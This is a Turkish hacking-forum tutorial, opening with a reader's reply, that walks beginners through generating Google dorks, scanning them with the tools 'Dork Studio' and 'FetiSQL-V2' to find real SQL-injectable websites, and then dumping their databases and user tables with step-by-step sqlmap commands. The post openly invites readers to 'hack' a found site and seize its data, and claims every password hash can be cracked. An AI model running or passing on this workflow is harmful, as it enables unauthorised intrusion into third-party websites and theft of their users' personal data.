- 10 Ağu 2019
- 123
- 26
Eline sağlık. Fakat tüm işlemleri yapıyorum dorklar sql. Txt kaydedildi yazıyor txt dosyasına girdiğimde hiçbir link yok boş txt sayfası çıkıyor sebebi nedir nasıl çözebilirim sorunu?Öncellikle siz değerli forum üyemizi/yöneticimizi burda görmekten mutluluk duyuyorum
Bugünki konumda dork oluşturup oluşturduğumuz dorkları tarayıp sql açıklı siteler bulup o sitelerden bir tanesini birlikte hackliyelim ne dersiniz ?
Konunun Temel Amacı Ne ?
Bu konuyu açmamdaki temel amaç web hacking başlıyacak olan arkadaşlara bir nebze bile olsun yol göstermek kafalarında bir fikir oluşturmak
Konunun Sonunda Ne Elde Edeceksiniz ?
Bu konu sonunda temel olarak dork oluşturabilecek, dorkları taratıp sql açıklı site tespit edip bu zaafiyetli sitelerden gerekli verileri ele geçirebileceksiniz
Herhangi bir sorunuz olursa lütfen konu altında belirtiniz
Başlıyalım
1- Dork (Google Dorks) Oluşturma
Nedir Bu Google Dork ?
Google dork, özel anahtar kelimeler veya operatörler kullanarak Google'da arama yapmak için kullanılan bir terimdir. Google dorkları, arama sonuçlarında belirli türdeki bilgileri, hassas bilgileri veya güvenlik açıklarını ortaya çıkarmak için kullanılabilir. Bazı yaygın kullanılan Google dorkları şunlardır:
Otomatik Olarak Zaafiyetli Google Dork Oluşturma
Ben şahsım adına dork oluşturmak için bizzat emek vererek @Mentalistler hocanın biz forum üyeleri için oluşturmuş olduğu Dork Studio toolunu kullanacağım siz başka toolarda kullanabilirsiniz
İlk olarak toolumuzu Githubtan git clone yaparak indirmemiz gerekir bunun için terminalimize
Kod:git clone https://github.com/mentalistler/Dork-Studio.git
yazıyoruz sonrasında ise sırasıyla
Kod:cd Dork-Studio/
Kod:python -m pip install -r requirements.txt
yaptıktan sonra toolu çalıştırmak için
Kod:python manage.py runserver
ve tarafımıza böyle bir çıktı verecektir
şimdi ise tarayıcımızın url kısmına http://localhost:8000 yazıyoruz Karşımıza böyle bir arayüz gelecek
burda ilk olarak oluşturmak istediğimiz dork türünü seçiyoruz daha sonra ise wordlist seçelim ve istediğimiz herhangi bir ülke varsa onuda seçip devam et (Next) diyoruz daha sonraki ekranımız bu şekilde olacaktır
Burda üretmek istediğiniz dork sayısını giriniz daha sonrasında eğerki wordlist seçtiyseniz herhangi bir karakter sayısı girmenize gerek yok karşımıza vereceği çıktı bu şekilde olacaktır
Burdan txt görünümünü seçip kopyalıyoruz şimdi ise 2.toolumuz olan dork tarama ve sql açıklı site bulmak için biz forum üyeleri için bizzat @Mentalistler
tarafından yapılmış bit tool olan fetisql v2 kullanacağız bunun için ilk olarak sırasıyla
Kod:git clone https://github.com/mentalistler/FetiSQL-V2.git cd FetiSQL-V2 pip install -r requirements.txt python main.py
Açılan menüde ilk olarak dork taratacağımız için ilk önce FetiSQL-V2 klasorüne gelip files/dorks.txt içine kopyaladığımız (oluşturduğumuz) dorkları yapıştırıyoruz kaydedip çıktıktan sonra terminalden FetiSQL-V2 çalıştırıyoruz
SQL açık kontrolü
Bunun için ekstra bir tool kurmamıza gerek yok zaten bu FetiSQL-V2 de mevcut bunun için menüden 2 diyip devam ediyoruz. Eğerki siz başka bir tooldan tarattıysanız dorklarınızı bulunan result dosyasını result/result.txt içine kaydediniz.işlem sonucunda açık olan siteleri bizler için böyle tek tek kaydedecektir.
Veri Çekme Nasıl Yapılır ?
Öncellikle FetiSQL-V2 toolumuzun bize verdiği açıklı siteler result/sql.txt içine kaydediliyor ordaki açıklı site linkini kopyalayıp yeni bir terminalde
Kod:sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --dbs
(çıktımız buna benzer olacaktır)
yapıp sitenin içinde barındırdığı database isimlerinini buluyoruz. (unutmadan eklemek istiyorum bu adımlarda y/n gibi sorular soruyor bazen bunlar c/s/q olabiliyor bu durumda sqlmap size önerdiğini büyük harfle gösterecektir Y/n gibi) Sonra ise
Kod:sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --current-db
yazıp hedef açıklı sitede aktif olarak kullanılan database ismini alıyoruz çıktımız bu sekilde olacaktır.
şimdi ise database içinde bulunan tabloları görüntüliyelim bunun için
Kod:sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --tables -D current db sonucumuzu yazıyoruz
çıktımız bu şekilde olacaktır burda tablo isimlerimizden az çok içinde hangi tür veriler bulunduğunu tahmin edebiliyoruz mesela benim örnekte önemli veriler kubrc_users ta olduğunu düşünüyorum şimdi ise bakalım seçtiğimiz tablonun içinde neler mevcutmuş bunun için
Kod:sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi
çıktımız buna benziyecek peki burda neler olduğunu gördük ve önemli bilgiler mevcut nasıl içeriğine bakacaz derseniz bunun için
Kod:sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi --dump
ve en son olarak bize verilerin nereye kaydedildiğini gösterir dosya yolunu kopyalayıp erişebilirsiniz
Önemli Bilgilendirmeler
1- Bazen veriler şifrelenmiş olarak gelebilir bunların terimsel isimlerine hash diyoruz bunları kırmak bazen zahmetli olabiliyor ancak kırılmayacak herhangi bir şifre yoktur.
2- @Mentalistler hoccanın tooları oldukça iyi daha detaylı bilgi için
3- FetiSQL-V2 konu linki FetiSQL-V2
4- Dork-Studio konu linki Dork-Studio
5- SQL ile herhangi bir bilginiz yok ise Web Hacking Giriş
6- hashları kırmak için Pass The Hash Saldırısı
Umarım Faydalı Olabilmişimdir
